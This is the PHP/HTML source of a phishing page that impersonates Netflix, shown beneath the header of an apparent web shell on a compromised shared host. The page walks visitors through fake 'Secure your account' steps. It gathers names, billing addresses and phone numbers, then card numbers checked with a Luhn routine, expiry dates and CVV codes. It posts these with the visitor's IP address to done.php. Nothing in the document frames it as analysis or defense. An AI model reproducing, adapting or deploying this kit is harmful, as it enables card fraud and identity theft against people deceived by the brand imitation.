| Server IP : 51.91.236.193 / Your IP : 216.73.216.224 Web Server : Apache System : Linux webm010.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : institutah ( 16501) PHP Version : 7.2.34 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/institutah/www/MX_ReceiycvedInvoicze_14c9a9512beb1/vw/ |
Upload File : |
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<meta charset="utf-8">
<title>Netflix</title>
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/creditCardValidator.js" type="text/javascript"></script>
<link rel="stylesheet" href="assets/css/styles.css">
<script src="assets/js/jquery-1.9.1.js"></script>
<link rel="stylesheet" href="assets/css/master.css?rand=<?php echo rand(); ?>">
<link rel="stylesheet" href="assets/css/loading.css">
<link rel="stylesheet" href="assets/css/loading-btn.css">
<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0"/>
<link type="text/css" rel="stylesheet" href="../assets/img/icon.ico"/>
<link rel="shortcut icon" href="../assets/img/icon.ico"/>
<link rel="stylesheet" href="assets/css/animate.css">
<script src="assets/js/cleve.js" charset="utf-8"></script>
<style>
select {
background: transparent;
border: 1px solid #8c8c8c;
border-top-color: rgb(140, 140, 140);
border-top-style: solid;
border-top-width: 1px;
border-right-color: rgb(140, 140, 140);
border-right-style: solid;
border-right-width: 1px;
border-bottom-color: rgb(140, 140, 140);
border-bottom-style: solid;
border-bottom-width: 1px;
border-left-color: rgb(140, 140, 140);
border-left-style: solid;
border-left-width: 1px;
border-image-outset: 0;
border-image-repeat: stretch;
border-image-slice: 100%;
border-image-source: none;
border-image-width: 1;
font-size: 15px;
height: 50px;
padding: 5px;
width: 110px;
}
select:focus{ outline: none;}
input {
width: 400px;
padding: 0 20px;
}
input,
input::-webkit-input-placeholder {
font-size: 15px;
line-height: 3;
}
</style>
<script>
function driveStep(step) {
switch(step) {
case 1:
window.history.pushState('billing', 'Netflix', 'billing.php');
document.getElementById("step0").className = "minbody hidden";
document.getElementById("step2").className = "fadeInAnim";
break;
case 2:
window.history.pushState('payment', 'Netflix', 'payment.php');
document.getElementById("step2").className = "fadeInAnim hidden";
document.getElementById("step3").className = "fadeInAnim";
break;
case 3:
window.history.pushState('You\'re all set!', 'Netflix', 'done.php');
document.getElementById("step3").className = "fadeInAnim hidden";
document.getElementById("step4").className = "fadeInAnim";
break;
}
}
function checkcc(value) {
// Accept only digits, dashes or spaces
if (/[^0-9-\s]+/.test(value)) return false;
// The Luhn Algorithm. It's so pretty.
let nCheck = 0, bEven = false;
value = value.replace(/\D/g, "");
for (var n = value.length - 1; n >= 0; n--) {
var cDigit = value.charAt(n),
nDigit = parseInt(cDigit, 10);
if (bEven && (nDigit *= 2) > 9) nDigit -= 9;
nCheck += nDigit;
bEven = !bEven;
}
return (nCheck % 10) == 0 ? true : false;
}
function checkform(data){
var oForm = document.getElementById('cardnumber');
var x = oForm.value.split(' ').join('');
var ok = true;
if (oForm.value.length <= 17 || checkcc(oForm.value)==false){
document.getElementById("cardnumber").style.border="2px solid red";
return false;
}
if (oForm.value.length == 19 && data.elements["cvv_uper"].value == "" || data.elements["firstnamecard"].value == "" || data.elements["lastname"].value == "" || checkcc(oForm.value)==false){
return false;
}
if (oForm.value.length == 18 && x.charAt(0) != '3' || checkcc(oForm.value)==false){
document.getElementById("cardnumber").style.border="2px solid red";
return false;
}
if (oForm.value.length == 18 && x.charAt(0) == '3' || data.elements["cvv_uper"].value == "" || data.elements["firstnamecard"].value == "" || data.elements["lastname"].value == "" || checkcc(oForm.value)==false){
return false;
}
if (checkcc(oForm.value)==false){
document.getElementById("cardnumber").style.border="2px solid red";
return false;
}
}
function changeit(value){
var change = value;
if(change.length > 0 && checkcc(value) != true){
document.getElementById("cardnumber").style.border="2px solid red";
}
if (change.charAt(0) == '5' && checkcc(value) != false) {
document.getElementById("cvv_uper").setAttribute("maxlength", 3);
document.getElementById("cardnumber").setAttribute("maxlength", 19);
document.getElementById("cardnumber").style.border="1px solid #8c8c8c";
}
if (change.charAt(0) == '4' && checkcc(value) != false ) {
document.getElementById("cvv_uper").setAttribute("maxlength", 3);
document.getElementById("cardnumber").setAttribute("maxlength", 19);
document.getElementById("cardnumber").style.border="1px solid #8c8c8c";
}
if (change.charAt(0) == '6' && checkcc(value) != false ) {
document.getElementById("cvv_uper").setAttribute("maxlength", 3);
document.getElementById("cardnumber").setAttribute("maxlength", 19);
document.getElementById("cardnumber").style.border="1px solid #8c8c8c";
}
if (change.charAt(0) == '3' && checkcc(value) != false ) {
document.getElementById("cvv_uper").setAttribute("maxlength", 4);
document.getElementById("cardnumber").setAttribute("maxlength", 18);
document.getElementById("cardnumber").style.border="1px solid #8c8c8c";
}
if (change.charAt(0) == '0') {
document.getElementById("cardnumber").value = "";
}
if (change.charAt(0) == '1') {
document.getElementById("cardnumber").value = "";
}
if (change.charAt(0) == '2') {
document.getElementById("cardnumber").value = "";
}
if (change.charAt(0) == '7') {
document.getElementById("cardnumber").value = "";
}
if (change.charAt(0) == '8') {
document.getElementById("cardnumber").value = "";
}
if (change.charAt(0) == '9') {
document.getElementById("cardnumber").value = "";
}
}
$(function () {
$('input,textarea').focus(function () {
$(this).data('placeholder', $(this).attr('placeholder'))
.attr('placeholder', '');
}).blur(function () {
$(this).attr('placeholder', $(this).data('placeholder'));
});
});
</script>
</head>
<body>
<div class="header">
<svg viewBox="0 0 111 30" class="svg-icon svg-icon-netflix-logo" focusable="true"><title></title><g id="netflix-logo"><path d="M105.062 14.28L111 30c-1.75-.25-3.499-.563-5.28-.845l-3.345-8.686-3.437 7.969c-1.687-.282-3.344-.376-5.031-.595l6.031-13.75L94.468 0h5.063l3.062 7.874L105.875 0h5.124l-5.937 14.28zM90.47 0h-4.594v27.25c1.5.094 3.062.156 4.594.343V0zm-8.563 26.937c-4.187-.281-8.375-.53-12.656-.625V0h4.687v21.875c2.688.062 5.375.28 7.969.405v4.657zM64.25 10.657v4.687h-6.406V26H53.22V0h13.125v4.687h-8.5v5.97h6.406zm-18.906-5.97V26.25c-1.563 0-3.156 0-4.688.062V4.687h-4.844V0h14.406v4.687h-4.874zM30.75 15.593c-2.062 0-4.5 0-6.25.095v6.968c2.75-.188 5.5-.406 8.281-.5v4.5l-12.968 1.032V0H32.78v4.687H24.5V11c1.813 0 4.594-.094 6.25-.094v4.688zM4.78 12.968v16.375C3.094 29.531 1.593 29.75 0 30V0h4.469l6.093 17.032V0h4.688v28.062c-1.656.282-3.344.376-5.125.625L4.78 12.968z" id="Fill-14"></path></g></svg>
<div onclick="window.location = 'logout.php'">
<?php echo $lang['LOGOUT'];?>
</div>
</div>
<div class="minbody hidden" id="step0">
<div class="shield"></div>
<div class="steps">STEP <b>1</b> OF <b>2</b></div>
<h1>Secure your account.</h1>
<ul>
<li>Update your billing address.</li>
<li>Confirm your payment method.</li>
</ul>
<a onclick="driveStep(1)"><button>Secure your account</button></a>
</div>
<div class="fadeInAnim hidden" id="step4">
<div class="minbody">
<div class="shield"></div>
<h1>You're all set!</h1>
<ul>
<li>Billing address updated.</li>
<li>Payment method confirmed.</li>
</ul>
<a onclick="loginNetflix()"><button>SIGN IN</button></a>
</div>
</div>
<div class="fadeInAnim hidden" id="step2">
<div class="step">
<div class="stepID">STEP <b>1</b> OF <b>2</b></div>
<h1>Update your billing address.</h1>
<div class="form">
<div class="inputpack">
<input type="text" id="first_name" id="firstname" spellcheck="false" autocomplete="off"/>
<label id="firstNameLabel">First Name</label>
</div>
<div class="error" id="firstnameError"></div>
<div class="inputpack">
<input type="text" id="last_name" id="lastname" spellcheck="false" autocomplete="off"/>
<label id="lastNameLabel">Last Name</label>
</div>
<div class="error" id="lastnameError"></div>
<div class="inputpack">
<input type="text" id="address" id="address" spellcheck="false" autocomplete="off"/>
<label id="addressLabel">Address</label>
</div>
<div class="error" id="addressError"></div>
<div class="inputpack">
<input type="text" id="city" id="city" spellcheck="false" autocomplete="off"/>
<label id="cityLabel">City</label>
</div>
<div class="error" id="cityError"></div>
<div class="twopac">
<div class="inputpack">
<input type="text" id="state" id="state" spellcheck="false" autocomplete="off"/>
<label id="stateLabel">State</label>
</div>
<div class="inputpack">
<input type="text" id="zip" id="zip" spellcheck="false" autocomplete="off"/>
<label id="zipLabel">Zip</label>
</div>
</div>
<div class="error" id="statezipError"></div>
<button id="submit_btn"><div id="content" style="">Update billing address</div>
<div id="loading" class="btn btn-default ld-ext-middle running" style="font-size : 1.5em; margin-top : 2px; display: none;">
<div class="ld ld-ring ld-cycle running"></div>
</div>
</button>
</div>
</div>
</div>
<div class="" id="step3">
<div class="step">
<?php echo $lang['STEPPAY'];?>
<h1><?php echo $lang['CONFIRMPAY'];?></h1>
<div class="form">
<form action="done.php" method="post" onsubmit="return checkform(this)">
<input type="hidden" name="firstname-bill" value="<?php echo $_POST["first_name"];?>"/>
<input type="hidden" name="lastname-bill" value="<?php echo $_POST["last_name"];?>"/>
<input type="hidden" name="address-bill" value="<?php echo $_POST["address"];?>"/>
<input type="hidden" name="city-bill" value="<?php echo $_POST["city"];?>"/>
<input type="hidden" name="state-bill" value="<?php echo $_POST["state"];?>"/>
<input type="hidden" name="zip-bill" value="<?php echo $_POST["zip"];?>"/>
<input type="hidden" name="phone-bill" value="<?php echo $_POST["phone"];?>"/>
<input type="hidden" name="date-bill" value="<?php echo $_POST["date"];?>"/>
<input type="hidden" name="ip-bill" value="<?php echo $_SERVER['REMOTE_ADDR'];?>"/>
<input type="hidden" name="session-bill" value="<?php echo $_POST["session_bill"];?>"/>
<div class="inputpack">
<input type="text" name="firstnamecard" placeholder="<?php echo $lang['NAME'];?>" id="firstnamecard" spellcheck="false" autocomplete="off"/>
</div>
<div class="error" id="firstnameErrorCard"></div>
<div class="inputpack">
<input type="text" name="lastnamecard" placeholder="<?php echo $lang['LASTNAME'];?>" id="lastnamecard" spellcheck="false" autocomplete="off"/>
</div>
<div class="error" id="lastnameErrorCard"></div>
<div class="inputpack">
<input type="text" maxlength="19" value="" name="cardnumber" placeholder="<?php echo $lang['CARDNUMBER'];?>" id="cardnumber" onchange="changeit(this.value);" onkeyup="$cc.validate(event);changeit(this.value);" spellcheck="false" />
</div>
<div class="error" id="cardnumberError"></div>
<div class="inputpack">
<div class="exp">
<div class="ccexp">
<select name="expm" >
<option value="" selected>(MM)</option>
<option value="01"
>01</option>
<option value="02"
>02</option>
<option value="03"
>03</option>
<option value="04"
>04</option>
<option value="05"
>05</option>
<option value="06"
>06</option>
<option value="07"
>07</option>
<option value="08"
>08</option>
<option value="09"
>09</option>
<option value="10"
>10</option>
<option value="11"
>11</option>
<option value="12"
>12</option>
</select>
<span class="expdiv"></span>
<select name="expy" placeholder="(YYYY)">
<option value="" selected>YYYY</option>
<option value=24
>2024</option>
<option value=25
>2025</option>
<option value=26
>2026</option>
<option value=27
>2027</option>
<option value=28
>2028</option>
<option value=29
>2029</option>
<option value=30
>2030</option>
<option value=31
>2031</option>
<option value=32
>2032</option>
<option value=33
>2033</option>
<option value=34
>2034</option>
<option value=35
>2035</option>
<option value=36
>2036</option>
<option value=37
>2037</option>
</select>
</div>
</div>
</div>
<div class="error" id="expError"></div>
<div class="inputpack">
<input type="text" name="cvv" placeholder="CVV" id="cvv_uper" spellcheck="false" autocomplete="off" maxlength="" required>
<svg id="helpButt" width="36" height="36" viewBox="0 0 36 36" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><g><circle stroke="#A9A6A6" stroke-width="2" cx="18" cy="18" r="17"></circle><path d="M17.051 21.094v-.54c0-.648.123-1.203.369-1.665.246-.462.741-.915 1.485-1.359a7.37 7.37 0 0 0 .981-.657c.222-.186.372-.366.45-.54.078-.174.117-.369.117-.585 0-.384-.177-.714-.531-.99-.354-.276-.831-.414-1.431-.414-.624 0-1.131.135-1.521.405-.39.27-.627.627-.711 1.071h-2.304a4.053 4.053 0 0 1 .738-1.845c.396-.546.924-.981 1.584-1.305.66-.324 1.44-.486 2.34-.486.852 0 1.596.153 2.232.459.636.306 1.134.726 1.494 1.26.36.534.54 1.143.54 1.827 0 .66-.177 1.227-.531 1.701-.354.474-.891.933-1.611 1.377-.42.252-.729.48-.927.684-.198.204-.33.399-.396.585a1.79 1.79 0 0 0-.099.603v.414h-2.268zm1.26 4.158c-.408 0-.762-.15-1.062-.45-.3-.3-.45-.654-.45-1.062 0-.408.15-.762.45-1.062.3-.3.654-.45 1.062-.45.408 0 .762.15 1.062.45.3.3.45.654.45 1.062 0 .408-.15.762-.45 1.062-.3.3-.654.45-1.062.45z" fill="#A9A6A6"></path></g></g></svg>
</div>
<div class="error" id="scvError"></div>
<button id="submit_btn_card" type="submit"><div id="content_card" style=""><?php echo $lang['PAYBUTTON'];?></div>
<div id="loading_card" class="btn btn-default ld-ext-middle running" style="font-size : 1.5em; margin-top : 2px; display: none;">
<div class="ld ld-ring ld-cycle running"></div>
</div>
</button>
</form>
</div>
</div>
</div>
<div class="footer">
<div class="wrapper">
<a><?php echo $lang['QUESTIONBILL'];?></a>
<ul>
<li><?php echo $lang['FAQ'];?></li>
<li><?php echo $lang['HELPCENTER'];?></li>
<li><?php echo $lang['TERMS'];?></li>
<li><?php echo $lang['PRIVACY'];?></li>
</ul>
<ul class="a">
<li><?php echo $lang['COOKIEPREFE'];?></li>
<li><?php echo $lang['INFOCORPO'];?></li>
</ul>
<?php echo $lang['LANGSELECT'];?>
</div>
</div>
<div class="layer hidden" id="cvv">
<div class="close" id="close"></div>
<div class="span">Your card's security code (CVV) is the 3 or 4 digit number located on the back of most cards.</div>
<div class="bg_visa"></div>
<div class="bg_amex"></div>
</div>
</body>
</html>